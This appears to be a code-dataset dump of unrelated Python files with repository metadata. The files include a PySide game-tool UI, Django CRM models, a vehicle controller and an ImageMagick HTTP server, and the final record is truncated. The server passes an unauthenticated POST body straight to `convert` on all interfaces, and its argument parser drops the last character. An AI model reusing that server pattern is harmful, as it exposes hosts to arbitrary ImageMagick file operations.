sexto sim sistema sob sobre sois somente somos sou sua suas são sétima sétimo só
tais tal talvez também tanta tanto tarde te tem temos tempo tendes tenho tens
tentar tentaram tente tentei ter terceira terceiro teu teus teve tipo tive
tivemos tiveram tiveste tivestes toda todas todo todos treze três tu tua tuas
tudo tão têm
um uma umas uns usa usar último
vai vais valor veja vem vens ver vez vezes vinda vindo vinte você vocês vos vossa
vossas vosso vossos vários vão vêm vós
zero
""".split()
)
| 35.971831 | 89 | 0.817541 | 424 | 2,554 | 4.910377 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000476 | 0.176977 | 2,554 | 70 | 90 | 36.485714 | 0.99001 | 0.004699 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014286 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
774b9166abe0ad0a7b9b9dd1b88e0f21b94c408a | 13,906 | py | Python | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 10 | 2015-06-13T17:27:18.000Z | 2021-02-14T13:03:11.000Z | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 2 | 2020-07-11T18:34:57.000Z | 2021-03-07T02:27:46.000Z | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 1 | 2016-03-23T22:26:23.000Z | 2016-03-23T22:26:23.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'miaschiev.ui'
#
# Created: Wed Aug 06 17:13:17 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Miaschiev(object):
def setupUi(self, Miaschiev):
Miaschiev.setObjectName("Miaschiev")
Miaschiev.resize(1333, 860)
self.centralwidget = QtGui.QWidget(Miaschiev)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.install_path = QtGui.QLineEdit(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.install_path.sizePolicy().hasHeightForWidth())
self.install_path.setSizePolicy(sizePolicy)
self.install_path.setObjectName("install_path")
self.gridLayout.addWidget(self.install_path, 2, 0, 1, 1)
self.save_browse = QtGui.QPushButton(self.centralwidget)
self.save_browse.setObjectName("save_browse")
self.gridLayout.addWidget(self.save_browse, 4, 1, 1, 1)
self.install_browse = QtGui.QPushButton(self.centralwidget)
self.install_browse.setObjectName("install_browse")
self.gridLayout.addWidget(self.install_browse, 2, 1, 1, 1)
self.save_path = QtGui.QLineEdit(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.save_path.sizePolicy().hasHeightForWidth())
self.save_path.setSizePolicy(sizePolicy)
self.save_path.setObjectName("save_path")
self.gridLayout.addWidget(self.save_path, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
self.label_2.setSizePolicy(sizePolicy)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 3, 0, 1, 2)
self.label = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 1, 0, 1, 2)
self.verticalLayout.addLayout(self.gridLayout)
spacerItem = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem)
self.save0 = QtGui.QPushButton(self.centralwidget)
self.save0.setEnabled(False)
self.save0.setMinimumSize(QtCore.QSize(0, 38))
self.save0.setMaximumSize(QtCore.QSize(416, 16777215))
self.save0.setObjectName("save0")
self.verticalLayout.addWidget(self.save0)
self.save1 = QtGui.QPushButton(self.centralwidget)
self.save1.setEnabled(False)
self.save1.setMinimumSize(QtCore.QSize(0, 38))
self.save1.setMaximumSize(QtCore.QSize(416, 16777215))
self.save1.setObjectName("save1")
self.verticalLayout.addWidget(self.save1)
self.save2 = QtGui.QPushButton(self.centralwidget)
self.save2.setEnabled(False)
self.save2.setMinimumSize(QtCore.QSize(0, 38))
self.save2.setMaximumSize(QtCore.QSize(416, 16777215))
self.save2.setObjectName("save2")
self.verticalLayout.addWidget(self.save2)
spacerItem1 = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem1)
self.formLayout = QtGui.QFormLayout()
self.formLayout.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout.setObjectName("formLayout")
self.lbl_coast = QtGui.QLabel(self.centralwidget)
self.lbl_coast.setEnabled(False)
self.lbl_coast.setObjectName("lbl_coast")
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.lbl_coast)
self.show_coast = QtGui.QPushButton(self.centralwidget)
self.show_coast.setEnabled(False)
self.show_coast.setObjectName("show_coast")
self.formLayout.setWidget(2, QtGui.QFormLayout.SpanningRole, self.show_coast)
spacerItem2 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(3, QtGui.QFormLayout.SpanningRole, spacerItem2)
self.lbl_urns = QtGui.QLabel(self.centralwidget)
self.lbl_urns.setEnabled(False)
self.lbl_urns.setObjectName("lbl_urns")
self.formLayout.setWidget(4, QtGui.QFormLayout.LabelRole, self.lbl_urns)
self.urns = QtGui.QLabel(self.centralwidget)
self.urns.setText("")
self.urns.setObjectName("urns")
self.formLayout.setWidget(4, QtGui.QFormLayout.FieldRole, self.urns)
self.show_urns = QtGui.QPushButton(self.centralwidget)
self.show_urns.setEnabled(False)
self.show_urns.setObjectName("show_urns")
self.formLayout.setWidget(5, QtGui.QFormLayout.SpanningRole, self.show_urns)
spacerItem3 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(6, QtGui.QFormLayout.SpanningRole, spacerItem3)
self.lbl_heads = QtGui.QLabel(self.centralwidget)
self.lbl_heads.setEnabled(False)
self.lbl_heads.setObjectName("lbl_heads")
self.formLayout.setWidget(7, QtGui.QFormLayout.LabelRole, self.lbl_heads)
self.heads = QtGui.QLabel(self.centralwidget)
self.heads.setObjectName("heads")
self.formLayout.setWidget(7, QtGui.QFormLayout.FieldRole, self.heads)
self.show_heads = QtGui.QPushButton(self.centralwidget)
self.show_heads.setEnabled(False)
self.show_heads.setObjectName("show_heads")
self.formLayout.setWidget(8, QtGui.QFormLayout.LabelRole, self.show_heads)
self.reset_head = QtGui.QPushButton(self.centralwidget)
self.reset_head.setEnabled(False)
self.reset_head.setObjectName("reset_head")
self.formLayout.setWidget(8, QtGui.QFormLayout.FieldRole, self.reset_head)
spacerItem4 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(9, QtGui.QFormLayout.SpanningRole, spacerItem4)
self.lbl_notes = QtGui.QLabel(self.centralwidget)
self.lbl_notes.setEnabled(False)
self.lbl_notes.setObjectName("lbl_notes")
self.formLayout.setWidget(10, QtGui.QFormLayout.LabelRole, self.lbl_notes)
self.notes = QtGui.QLabel(self.centralwidget)
self.notes.setText("")
self.notes.setObjectName("notes")
self.formLayout.setWidget(10, QtGui.QFormLayout.FieldRole, self.notes)
self.reset_notezz = QtGui.QPushButton(self.centralwidget)
self.reset_notezz.setEnabled(False)
self.reset_notezz.setObjectName("reset_notezz")
self.formLayout.setWidget(11, QtGui.QFormLayout.SpanningRole, self.reset_notezz)
spacerItem5 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(12, QtGui.QFormLayout.SpanningRole, spacerItem5)
self.lbl_plants = QtGui.QLabel(self.centralwidget)
self.lbl_plants.setEnabled(False)
self.lbl_plants.setObjectName("lbl_plants")
self.formLayout.setWidget(13, QtGui.QFormLayout.LabelRole, self.lbl_plants)
self.plants = QtGui.QLabel(self.centralwidget)
self.plants.setText("")
self.plants.setObjectName("plants")
self.formLayout.setWidget(13, QtGui.QFormLayout.FieldRole, self.plants)
self.coast = QtGui.QLabel(self.centralwidget)
self.coast.setText("")
self.coast.setObjectName("coast")
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.coast)
self.verticalLayout.addLayout(self.formLayout)
spacerItem6 = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem6)
self.save_map = QtGui.QPushButton(self.centralwidget)
self.save_map.setEnabled(False)
self.save_map.setObjectName("save_map")
self.verticalLayout.addWidget(self.save_map)
spacerItem7 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem7)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.scrollArea = QtGui.QScrollArea(self.centralwidget)
self.scrollArea.setMinimumSize(QtCore.QSize(768, 0))
self.scrollArea.setBaseSize(QtCore.QSize(1024, 1024))
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 1024, 1024))
self.scrollAreaWidgetContents.setMinimumSize(QtCore.QSize(1024, 1024))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.horizontalLayout_2.addWidget(self.scrollArea)
Miaschiev.setCentralWidget(self.centralwidget)
self.statusBar = QtGui.QStatusBar(Miaschiev)
self.statusBar.setObjectName("statusBar")
Miaschiev.setStatusBar(self.statusBar)
self.retranslateUi(Miaschiev)
QtCore.QMetaObject.connectSlotsByName(Miaschiev)
Miaschiev.setTabOrder(self.install_path, self.install_browse)
Miaschiev.setTabOrder(self.install_browse, self.save_path)
Miaschiev.setTabOrder(self.save_path, self.save_browse)
Miaschiev.setTabOrder(self.save_browse, self.save0)
Miaschiev.setTabOrder(self.save0, self.save1)
Miaschiev.setTabOrder(self.save1, self.save2)
Miaschiev.setTabOrder(self.save2, self.show_coast)
Miaschiev.setTabOrder(self.show_coast, self.show_urns)
Miaschiev.setTabOrder(self.show_urns, self.show_heads)
Miaschiev.setTabOrder(self.show_heads, self.reset_head)
Miaschiev.setTabOrder(self.reset_head, self.reset_notezz)
Miaschiev.setTabOrder(self.reset_notezz, self.scrollArea)
def retranslateUi(self, Miaschiev):
Miaschiev.setWindowTitle(QtGui.QApplication.translate("Miaschiev", "Mias(Achievement)mata", None, QtGui.QApplication.UnicodeUTF8))
self.save_browse.setText(QtGui.QApplication.translate("Miaschiev", "Browse...", None, QtGui.QApplication.UnicodeUTF8))
self.install_browse.setText(QtGui.QApplication.translate("Miaschiev", "Browse...", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Miaschiev", "Miasmata Saved Games Location:", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Miaschiev", "Miasmata Install Location:", None, QtGui.QApplication.UnicodeUTF8))
self.save0.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 1", None, QtGui.QApplication.UnicodeUTF8))
self.save1.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 2", None, QtGui.QApplication.UnicodeUTF8))
self.save2.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 3", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_coast.setText(QtGui.QApplication.translate("Miaschiev", "Coastline Mapped:", None, QtGui.QApplication.UnicodeUTF8))
self.show_coast.setText(QtGui.QApplication.translate("Miaschiev", "Show Mapped Coastline", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_urns.setText(QtGui.QApplication.translate("Miaschiev", "Urns Lit:", None, QtGui.QApplication.UnicodeUTF8))
self.show_urns.setText(QtGui.QApplication.translate("Miaschiev", "Show Lit Urns", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_heads.setText(QtGui.QApplication.translate("Miaschiev", "Head Statues Located:", None, QtGui.QApplication.UnicodeUTF8))
self.show_heads.setText(QtGui.QApplication.translate("Miaschiev", "Show", None, QtGui.QApplication.UnicodeUTF8))
self.reset_head.setText(QtGui.QApplication.translate("Miaschiev", "Reset one statue...", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_notes.setText(QtGui.QApplication.translate("Miaschiev", "Notes Found:", None, QtGui.QApplication.UnicodeUTF8))
self.reset_notezz.setText(QtGui.QApplication.translate("Miaschiev", "Reset missing Sanchez #1 note...", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_plants.setText(QtGui.QApplication.translate("Miaschiev", "Plants Found:", None, QtGui.QApplication.UnicodeUTF8))
self.save_map.setText(QtGui.QApplication.translate("Miaschiev", "Save current map to file...", None, QtGui.QApplication.UnicodeUTF8))
| 64.082949 | 151 | 0.718898 | 1,473 | 13,906 | 6.706721 | 0.120842 | 0.065391 | 0.051017 | 0.067315 | 0.516955 | 0.440024 | 0.223201 | 0.177245 | 0.160846 | 0.160846 | 0 | 0.023159 | 0.170933 | 13,906 | 216 | 152 | 64.37963 | 0.833724 | 0.01618 | 0 | 0.059113 | 1 | 0 | 0.061014 | 0.003344 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009852 | false | 0 | 0.004926 | 0 | 0.019704 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7756950ec6fb5c1205ec5e03552facad7a4cc3ac | 387 | py | Python | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | 3 | 2021-06-20T02:24:10.000Z | 2022-01-26T23:55:33.000Z | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | core/recc/compile/future.py | bogonets/answer | 57f892a9841980bcbc35fa1e27521b34cd94bc25 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from importlib import import_module
def get_annotations_compiler_flag() -> int:
future = import_module("__future__")
assert future is not None
annotations = getattr(future, "annotations")
assert annotations is not None
compiler_flag = getattr(annotations, "compiler_flag")
assert isinstance(compiler_flag, int)
return compiler_flag
| 27.642857 | 57 | 0.731266 | 46 | 387 | 5.869565 | 0.456522 | 0.222222 | 0.17037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003155 | 0.180879 | 387 | 13 | 58 | 29.769231 | 0.84858 | 0.054264 | 0 | 0 | 0 | 0 | 0.093407 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
775775cc7a45c42108314eb9aa9a67d61fab3d99 | 181 | py | Python | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | current_console.py | jonasitzmann/ann-numpy | bb6d22667158687ca2d3de92abbeee0e129fa18e | [
"MIT"
] | null | null | null | from ann import *
x, y = utils.get_mnist_samples(100)
m = Model(x[0].shape)
m.add(Conv2D())
m.add(MaxPooling())
m.add(Flatten())
m.add(Dense(15))
m.add(Dense(10, a_func='sigmoid'))
| 20.111111 | 35 | 0.679558 | 35 | 181 | 3.428571 | 0.685714 | 0.166667 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054878 | 0.093923 | 181 | 8 | 36 | 22.625 | 0.676829 | 0 | 0 | 0 | 0 | 0 | 0.038674 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
775cbe05f1e23d8b5ab980d33a068bbf4e214d9f | 2,559 | py | Python | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | server/imagemagick-server/server.py | brygga-dev/workdir2 | 0b6e8f54a3d44ef8dedefd1bdc95f193467d239e | [
"MIT"
] | null | null | null | from http.server import BaseHTTPRequestHandler,HTTPServer
from socketserver import ThreadingMixIn
import threading
import subprocess
import urllib.parse
# todo: factor out common server stuff
# todo: these should probably have limited
# access to files, so something like only
# uploads dir may be good.
# then there is slight problem about
# possibility to optimize theme files
# for example (which should be done first,
# but it'd be convenient to reuse this.)
# Maybe allow to mount a theme path
# Collecting args, stripping quotes string for
# it to work with subprocess.Popen
# Assuming only single quoted strings
def append_args(cmd_list, cmd_args):
in_string = False
accum = ""
for i in range(0, len(cmd_args) - 1):
char = cmd_args[i]
if (in_string):
if (char == "'"):
cmd_list.append(accum)
accum = ""
in_string = False
else:
accum = accum + char
else:
if (char == " "):
if (accum != ""):
cmd_list.append(accum)
accum = ""
elif (accum == "" and char == "'"):
in_string = True
else:
accum = accum + char
if (accum != ""):
cmd_list.append(accum)
return cmd_list
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
#subprocess.Popen(["ls", "-la", "/imgs"])
#subprocess.Popen(["id", "-u"])
#subprocess.Popen(["id", "-u", "-n"])
content_length = int(self.headers['Content-Length'])
cmd_args = self.rfile.read(content_length).decode('utf-8')
if len(cmd_args) > 0:
print(cmd_args)
cmd_list = append_args(["convert"], cmd_args)
print(cmd_list)
CmdOut = subprocess.Popen(cmd_list)
(stdout,stderr) = CmdOut.communicate()
print(stdout)
print(stderr)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("ok".encode('utf-8'))
#def log_message(self, format, *args):
# suppress logging per request
#return
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
if __name__ == '__main__':
print('Imagemagick server starts')
httpd = ThreadingSimpleServer(('0.0.0.0', 1345), Handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Imagemagick server stops')
| 30.831325 | 66 | 0.5932 | 297 | 2,559 | 4.983165 | 0.505051 | 0.037838 | 0.035135 | 0.036486 | 0.058108 | 0.039189 | 0.039189 | 0 | 0 | 0 | 0 | 0.008864 | 0.294646 | 2,559 | 82 | 67 | 31.207317 | 0.81108 | 0.241891 | 0 | 0.303571 | 0 | 0 | 0.063509 | 0 | 0 | 0 | 0 | 0.012195 | 0 | 1 | 0.035714 | false | 0.035714 | 0.089286 | 0 | 0.178571 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
775ee35015e7fb1a1d56468e759eea466f2753f3 | 388 | py | Python | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | 1 | 2020-10-17T04:41:47.000Z | 2020-10-17T04:41:47.000Z | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | null | null | null | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | null | null | null | from tastypie.authentication import SessionAuthentication
class UberAuthentication(SessionAuthentication):
"""
Handles authentication for the course resources.
"""
def is_authenticated(self, request, **kwargs):
if request.method == 'GET':
return True
else:
return super(UberAuthentication, self).is_authenticated(request, **kwargs) | 35.272727 | 86 | 0.693299 | 35 | 388 | 7.628571 | 0.714286 | 0.11236 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.219072 | 388 | 11 | 86 | 35.272727 | 0.881188 | 0.123711 | 0 | 0 | 0 | 0 | 0.009231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
91f2badbe46ccc2afa070e8ea0d95aa258e9f159 | 3,199 | py | Python | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | from django.db import models
from django.urls import reverse
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.core.validators import RegexValidator
from core import utils
from core.models import User
from contacts.models import Contact
class ActiveParentManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class ParentAccount(models.Model):
name = models.CharField(pgettext_lazy("Name of Account", "Name"), max_length=64, unique=True, help_text='Required')
category = models.CharField(_("Category"), max_length=10, choices=utils.ACC_CATEGORY, help_text='Required',)
slug = models.SlugField(unique=True)
is_active = models.BooleanField(_("Is Active"), default=True)
created_by = models.ForeignKey(User, related_name="parent_created_by", on_delete=models.PROTECT)
created = models.DateTimeField(_("Created"), auto_now_add=True)
updated = models.DateTimeField(_("Updated"), auto_now=True)
def __str__(self):
return self.name
class Meta:
ordering = ["name"]
verbose_name = 'Parent Account'
verbose_name_plural = 'Parent Accounts'
objects = models.Manager() # The default manager.
active = ActiveParentManager() # Custom manager.
class ActiveAccountsManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class Account(models.Model):
name = models.CharField(pgettext_lazy("Name of Account", "Name"), max_length=64, unique=True, help_text='Required')
country = models.CharField(_("Country"), max_length=30, choices=utils.COUNTRIES, help_text='Required')
industry = models.CharField(_("Industry"), max_length=255, choices=utils.ACC_INDUSTRY, help_text='Required')
parent_account = models.ForeignKey(ParentAccount, related_name="account_parent_account", on_delete=models.PROTECT, help_text='Required')
slug = models.SlugField(unique=True)
status = models.CharField(_("Status"), max_length=15, choices=utils.ACC_STATUS, default="Prospect", help_text='Required')
address = models.CharField(_("Address"), max_length=255, blank=True, null=True)
website = models.URLField(_("Website"), blank=True, null=True)
description = models.TextField(blank=True, null=True)
is_active = models.BooleanField(_("Is Active"), default=True)
created_by = models.ForeignKey(User, related_name="account_created_by", on_delete=models.PROTECT)
created = models.DateTimeField(_("Created"), auto_now_add=True)
updated = models.DateTimeField(_("Updated"), auto_now=True)
contacts = models.ManyToManyField(Contact, related_name="account_contacts", blank=True)
assigned_to = models.ForeignKey(User, related_name="account_assigned_user", on_delete=models.PROTECT)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse("accounts:detail", args=[self.slug])
class Meta:
ordering = ["status"]
verbose_name = 'Account'
objects = models.Manager() # The default manager.
active = ActiveAccountsManager() # Custom manager.
| 42.092105 | 140 | 0.736168 | 391 | 3,199 | 5.808184 | 0.250639 | 0.046235 | 0.049317 | 0.036988 | 0.481286 | 0.453104 | 0.412153 | 0.374284 | 0.336416 | 0.336416 | 0 | 0.005837 | 0.14317 | 3,199 | 75 | 141 | 42.653333 | 0.822692 | 0.02282 | 0 | 0.4 | 0 | 0 | 0.110897 | 0.013782 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.145455 | 0.090909 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
91f411263bdba1a973d2748f05c7f918cdbad645 | 1,176 | py | Python | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | null | null | null | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | null | null | null | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | 2 | 2019-02-05T02:55:57.000Z | 2019-02-10T20:12:41.000Z | from yaw_controller import YawController
from pid import PID
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class Controller(object):
def __init__(self, wheel_base, steer_ratio,max_lat_accel,max_steer_angle, accel_limit,decel_limit):
self.yaw = YawController(wheel_base, steer_ratio, 0., max_lat_accel, max_steer_angle)
self.steer = 0.0
self.throttle = 0.0
self.brake = 0.0
self.kp = 0.9
self.ki = 0.01
self.kd = 0.4
self.mn = decel_limit
self.mx = 0.5
self.pid = PID(self.kp,self.ki,self.kd ,self.mn,self.mx)
self.accel =None
def control(self,lin_vel,ang_vel,curr_vel,sample_time,vehicle_mass, wheel_radius,dbw):
self.steer = self.yaw.get_steering(lin_vel,ang_vel,curr_vel)
error = lin_vel- curr_vel
if lin_vel == 0 and curr_vel ==0:
self.throttle = 0
self.brake = 700 #prevent rolling forward
if dbw:
accel_target =self.pid.step(error,sample_time )
if accel_target >=0 :
self.throttle = accel_target
self.brake = 0.0
else:
self.throttle = 0.0
self.brake = -accel_target*vehicle_mass*wheel_radius
return self.throttle, self.brake, self.steer
| 25.021277 | 104 | 0.681973 | 191 | 1,176 | 3.973822 | 0.340314 | 0.046113 | 0.031621 | 0.050066 | 0.173913 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0.040043 | 0.214286 | 1,176 | 46 | 105 | 25.565217 | 0.781385 | 0.019558 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
91fc55bd294641a3405ae46e672d73216e1f79e0 | 450 | py | Python | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 10 | 2017-04-25T20:20:14.000Z | 2021-02-26T18:57:59.000Z | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
